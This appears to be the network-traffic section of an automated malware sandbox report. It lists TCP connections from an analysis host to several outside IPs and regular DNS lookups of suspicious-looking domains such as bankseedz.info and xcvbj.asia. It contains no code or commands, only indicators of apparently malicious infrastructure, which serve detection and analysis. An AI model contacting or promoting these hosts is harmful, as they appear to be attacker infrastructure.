                                                                                                                  Dec 2, 2024 15:24:45.641832113 CET4990580192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:45.862433910 CET4990580192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:46.883783102 CET4991480192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:47.003846884 CET804991446.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:47.003933907 CET4991480192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:47.027004004 CET4991480192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:47.147291899 CET804991446.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:47.147309065 CET804991446.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:48.311336040 CET804991446.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:48.362325907 CET4991480192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:48.405545950 CET804991446.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:48.405608892 CET4991480192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:48.535212994 CET4991480192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:49.553100109 CET4992080192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:49.673330069 CET804992046.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:49.673430920 CET4992080192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:49.683216095 CET4992080192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:49.803558111 CET804992046.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:50.989335060 CET804992046.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:50.989502907 CET804992046.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:50.989605904 CET4992080192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:50.992428064 CET4992080192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:51.112463951 CET804992046.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:56.785228968 CET4993680192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:56.905250072 CET8049936103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:56.905451059 CET4993680192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:56.919828892 CET4993680192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:57.039839983 CET8049936103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:58.149471045 CET8049936103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:58.149585962 CET8049936103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:58.149770021 CET4993680192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:58.424916029 CET4993680192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:58.746386051 CET8049936103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:58.746438980 CET4993680192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:59.444574118 CET4994280192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:59.565140009 CET8049942103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:59.569209099 CET4994280192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:59.584525108 CET4994280192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:59.704572916 CET8049942103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:00.822520971 CET8049942103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:00.822663069 CET8049942103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:00.822710037 CET4994280192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:01.096812963 CET4994280192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:02.116997004 CET4994880192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:02.236907959 CET8049948103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:02.237035990 CET4994880192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:02.252502918 CET4994880192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:02.372637033 CET8049948103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:02.372653008 CET8049948103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:03.546399117 CET8049948103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:03.546411991 CET8049948103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:03.552587986 CET4994880192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:03.768866062 CET4994880192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:04.789002895 CET4995580192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:04.909284115 CET8049955103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:04.909390926 CET4995580192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:04.921197891 CET4995580192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:05.041140079 CET8049955103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:06.141623974 CET8049955103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:06.141657114 CET8049955103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:06.141670942 CET8049955103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:06.141855955 CET4995580192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:06.141855955 CET4995580192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:06.146522045 CET4995580192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:06.266530037 CET8049955103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:12.352336884 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:12.472331047 CET8049972149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:12.472418070 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:12.496956110 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:12.616931915 CET8049972149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:14.002988100 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:14.074155092 CET8049972149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:14.074286938 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:14.074922085 CET8049972149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:14.075109005 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:14.123193026 CET8049972149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:14.123594046 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:15.022811890 CET4998180192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:15.142858982 CET8049981149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:15.142956018 CET4998180192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:15.165941954 CET4998180192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:15.286156893 CET8049981149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:16.675008059 CET4998180192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:16.795341969 CET8049981149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:16.795419931 CET4998180192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:17.694153070 CET4998780192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:17.814203978 CET8049987149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:17.814351082 CET4998780192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:17.830518007 CET4998780192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:17.950525999 CET8049987149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:17.950577021 CET8049987149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:19.331147909 CET4998780192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:19.424402952 CET8049987149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:19.424649000 CET4998780192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:19.451792955 CET8049987149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:19.452011108 CET4998780192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:20.350693941 CET4999280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:20.471584082 CET8049992149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:20.471695900 CET4999280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:20.484267950 CET4999280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:20.604758978 CET8049992149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:22.080389977 CET8049992149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:22.080404997 CET8049992149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:22.080569029 CET4999280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:22.083523989 CET4999280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:22.203490973 CET8049992149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:27.967376947 CET5000180192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:28.087382078 CET8050001101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:28.087656975 CET5000180192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:28.108784914 CET5000180192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:28.228960991 CET8050001101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:29.612576008 CET5000180192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:29.637854099 CET8050001101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:29.638012886 CET8050001101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:29.638111115 CET5000180192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:29.638112068 CET5000180192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:26:21.889749050 CET805001543.205.198.29192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:21.889890909 CET5001580192.168.2.543.205.198.29
                                                                                                                  Dec 2, 2024 15:26:22.004015923 CET805001543.205.198.29192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:22.004220963 CET5001580192.168.2.543.205.198.29
                                                                                                                  Dec 2, 2024 15:26:22.897855997 CET5001680192.168.2.543.205.198.29
                                                                                                                  Dec 2, 2024 15:26:23.017946005 CET805001643.205.198.29192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:23.018038034 CET5001680192.168.2.543.205.198.29
                                                                                                                  Dec 2, 2024 15:26:23.029009104 CET5001680192.168.2.543.205.198.29
                                                                                                                  Dec 2, 2024 15:26:23.149022102 CET805001643.205.198.29192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:24.548451900 CET805001643.205.198.29192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:24.548682928 CET805001643.205.198.29192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:24.548736095 CET5001680192.168.2.543.205.198.29
                                                                                                                  Dec 2, 2024 15:26:24.553010941 CET5001680192.168.2.543.205.198.29
                                                                                                                  Dec 2, 2024 15:26:24.673032999 CET805001643.205.198.29192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:29.949289083 CET5001780192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:30.069364071 CET8050017172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:30.070606947 CET5001780192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:30.085380077 CET5001780192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:30.205373049 CET8050017172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:31.596620083 CET5001780192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:31.717149019 CET8050017172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:31.717293024 CET5001780192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:32.618653059 CET5001880192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:32.738851070 CET8050018172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:32.738972902 CET5001880192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:32.757044077 CET5001880192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:32.877173901 CET8050018172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:34.268652916 CET5001880192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:34.389540911 CET8050018172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:34.392662048 CET5001880192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:35.287596941 CET5001980192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:35.407601118 CET8050019172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:35.407768011 CET5001980192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:35.424570084 CET5001980192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:35.544780970 CET8050019172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:35.544837952 CET8050019172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:36.940519094 CET5001980192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:37.061064959 CET8050019172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:37.061178923 CET5001980192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:37.959338903 CET5002080192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:38.079698086 CET8050020172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:38.079911947 CET5002080192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:38.090502977 CET5002080192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:38.210894108 CET8050020172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:40.067817926 CET8050020172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:40.067833900 CET8050020172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:40.067970991 CET8050020172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:40.068177938 CET5002080192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:40.072451115 CET5002080192.168.2.5172.67.187.114
                                                                                                                  Dec 2, 2024 15:26:40.192676067 CET8050020172.67.187.114192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:45.553685904 CET5002180192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:45.674069881 CET8050021172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:45.674201965 CET5002180192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:45.688560963 CET5002180192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:45.808465004 CET8050021172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:47.190347910 CET5002180192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:47.272048950 CET8050021172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:47.272073984 CET8050021172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:47.272121906 CET5002180192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:47.272164106 CET5002180192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:47.310843945 CET8050021172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:47.310900927 CET5002180192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:48.212898970 CET5002280192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:48.333039999 CET8050022172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:48.333163977 CET5002280192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:48.347707033 CET5002280192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:48.467796087 CET8050022172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:49.854129076 CET8050022172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:49.855145931 CET8050022172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:49.855247974 CET8050022172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:49.862195969 CET5002280192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:49.863240957 CET5002280192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:50.881892920 CET5002380192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:51.002070904 CET8050023172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:51.002190113 CET5002380192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:51.019052982 CET5002380192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:51.139153004 CET8050023172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:51.139300108 CET8050023172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:52.517781973 CET8050023172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:52.518929958 CET8050023172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:52.524614096 CET5002380192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:52.556555986 CET5002380192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:53.572477102 CET5002480192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:53.692595005 CET8050024172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:53.692780972 CET5002480192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:53.704754114 CET5002480192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:53.826673985 CET8050024172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:55.200845957 CET8050024172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:55.201956987 CET8050024172.67.167.146192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:55.202013016 CET5002480192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:55.207417011 CET5002480192.168.2.5172.67.167.146
                                                                                                                  Dec 2, 2024 15:26:55.330040932 CET8050024172.67.167.146192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 2, 2024 15:23:36.466485977 CET | 49537 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:23:37.471918106 CET | 49537 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:23:37.964307070 CET | 53 | 49537 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:23:37.964364052 CET | 53 | 49537 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:23:54.902439117 CET | 64917 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:23:55.490014076 CET | 53 | 64917 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:24:10.085297108 CET | 49626 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:24:10.495593071 CET | 53 | 49626 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:24:25.069411993 CET | 50397 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:24:26.029858112 CET | 53 | 50397 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:24:41.086594105 CET | 53416 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:24:41.531589985 CET | 53 | 53416 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:24:56.010541916 CET | 62838 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:24:56.782043934 CET | 53 | 62838 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:25:11.163156033 CET | 59310 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:25:12.175195932 CET | 59310 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:25:12.332009077 CET | 53 | 59310 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:25:12.332024097 CET | 53 | 59310 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:25:27.100651026 CET | 53823 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:25:27.960367918 CET | 53 | 53823 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:25:42.679843903 CET | 62240 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:25:43.208271027 CET | 53 | 62240 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:25:58.069540024 CET | 60931 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:25:58.784657955 CET | 53 | 60931 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:26:14.236908913 CET | 65080 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:26:14.882216930 CET | 53 | 65080 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:26:29.570499897 CET | 62408 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:26:29.946559906 CET | 53 | 62408 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:26:45.085328102 CET | 49908 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:26:45.550964117 CET | 53 | 49908 | 1.1.1.1 | 192.168.2.5
Dec 2, 2024 15:27:00.228488922 CET | 64251 | 53 | 192.168.2.5 | 1.1.1.1
Dec 2, 2024 15:27:01.153955936 CET | 53 | 64251 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 2, 2024 15:23:36.466485977 CET | 192.168.2.5 | 1.1.1.1 | 0xfdf9 | Standard query (0) | www.thaor56.online | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:23:37.471918106 CET | 192.168.2.5 | 1.1.1.1 | 0xfdf9 | Standard query (0) | www.thaor56.online | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:23:54.902439117 CET | 192.168.2.5 | 1.1.1.1 | 0xc204 | Standard query (0) | www.optimismbank.xyz | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:24:10.085297108 CET | 192.168.2.5 | 1.1.1.1 | 0x9dd3 | Standard query (0) | www.greenthub.life | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:24:25.069411993 CET | 192.168.2.5 | 1.1.1.1 | 0x89c6 | Standard query (0) | www.laohub10.net | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:24:41.086594105 CET | 192.168.2.5 | 1.1.1.1 | 0x81d9 | Standard query (0) | www.bankseedz.info | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:24:56.010541916 CET | 192.168.2.5 | 1.1.1.1 | 0xab4 | Standard query (0) | www.madhf.tech | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:25:11.163156033 CET | 192.168.2.5 | 1.1.1.1 | 0x83a2 | Standard query (0) | www.xcvbj.asia | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:25:12.175195932 CET | 192.168.2.5 | 1.1.1.1 | 0x83a2 | Standard query (0) | www.xcvbj.asia | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:25:27.100651026 CET | 192.168.2.5 | 1.1.1.1 | 0x3acf | Standard query (0) | www.yc791022.asia | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:25:42.679843903 CET | 192.168.2.5 | 1.1.1.1 | 0x8456 | Standard query (0) | www.43kdd.top | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:25:58.069540024 CET | 192.168.2.5 | 1.1.1.1 | 0xbae8 | Standard query (0) | www.jcsa.info | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:26:14.236908913 CET | 192.168.2.5 | 1.1.1.1 | 0x36ac | Standard query (0) | www.1secondlending.one | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:26:29.570499897 CET | 192.168.2.5 | 1.1.1.1 | 0x321d | Standard query (0) | www.zkdamdjj.shop | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:26:45.085328102 CET | 192.168.2.5 | 1.1.1.1 | 0xd7bb | Standard query (0) | www.rgenerousrs.store | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:27:00.228488922 CET | 192.168.2.5 | 1.1.1.1 | 0x7a44 | Standard query (0) | www.bpgroup.site | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 2, 2024 15:23:37.964307070 CET | 1.1.1.1 | 192.168.2.5 | 0xfdf9 | No error (0) | www.thaor56.online | thaor56.online |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 15:23:37.964307070 CET | 1.1.1.1 | 192.168.2.5 | 0xfdf9 | No error (0) | thaor56.online |  | 202.92.5.23 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:23:37.964364052 CET | 1.1.1.1 | 192.168.2.5 | 0xfdf9 | No error (0) | www.thaor56.online | thaor56.online |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 15:23:37.964364052 CET | 1.1.1.1 | 192.168.2.5 | 0xfdf9 | No error (0) | thaor56.online |  | 202.92.5.23 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:23:55.490014076 CET | 1.1.1.1 | 192.168.2.5 | 0xc204 | No error (0) | www.optimismbank.xyz |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:23:55.490014076 CET | 1.1.1.1 | 192.168.2.5 | 0xc204 | No error (0) | www.optimismbank.xyz |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:24:10.495593071 CET | 1.1.1.1 | 192.168.2.5 | 0x9dd3 | No error (0) | www.greenthub.life |  | 209.74.77.109 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:24:26.029858112 CET | 1.1.1.1 | 192.168.2.5 | 0x89c6 | No error (0) | www.laohub10.net | r0lqcud7.nbnnn.xyz |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 15:24:26.029858112 CET | 1.1.1.1 | 192.168.2.5 | 0x89c6 | No error (0) | r0lqcud7.nbnnn.xyz |  | 202.79.161.151 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:24:26.029858112 CET | 1.1.1.1 | 192.168.2.5 | 0x89c6 | No error (0) | r0lqcud7.nbnnn.xyz |  | 23.225.159.42 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:24:26.029858112 CET | 1.1.1.1 | 192.168.2.5 | 0x89c6 | No error (0) | r0lqcud7.nbnnn.xyz |  | 23.225.160.132 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:24:26.029858112 CET | 1.1.1.1 | 192.168.2.5 | 0x89c6 | No error (0) | r0lqcud7.nbnnn.xyz |  | 27.124.4.246 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:24:41.531589985 CET | 1.1.1.1 | 192.168.2.5 | 0x81d9 | No error (0) | www.bankseedz.info |  | 46.30.211.38 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:24:56.782043934 CET | 1.1.1.1 | 192.168.2.5 | 0xab4 | No error (0) | www.madhf.tech |  | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:25:12.332009077 CET | 1.1.1.1 | 192.168.2.5 | 0x83a2 | No error (0) | www.xcvbj.asia |  | 149.88.81.190 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:25:12.332024097 CET | 1.1.1.1 | 192.168.2.5 | 0x83a2 | No error (0) | www.xcvbj.asia |  | 149.88.81.190 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:25:27.960367918 CET | 1.1.1.1 | 192.168.2.5 | 0x3acf | No error (0) | www.yc791022.asia |  | 101.35.209.183 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:25:43.208271027 CET | 1.1.1.1 | 192.168.2.5 | 0x8456 | No error (0) | www.43kdd.top | 43kdd.top |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 15:25:43.208271027 CET | 1.1.1.1 | 192.168.2.5 | 0x8456 | No error (0) | 43kdd.top |  | 38.47.232.202 | A (IP address) | IN (0x0001) | false
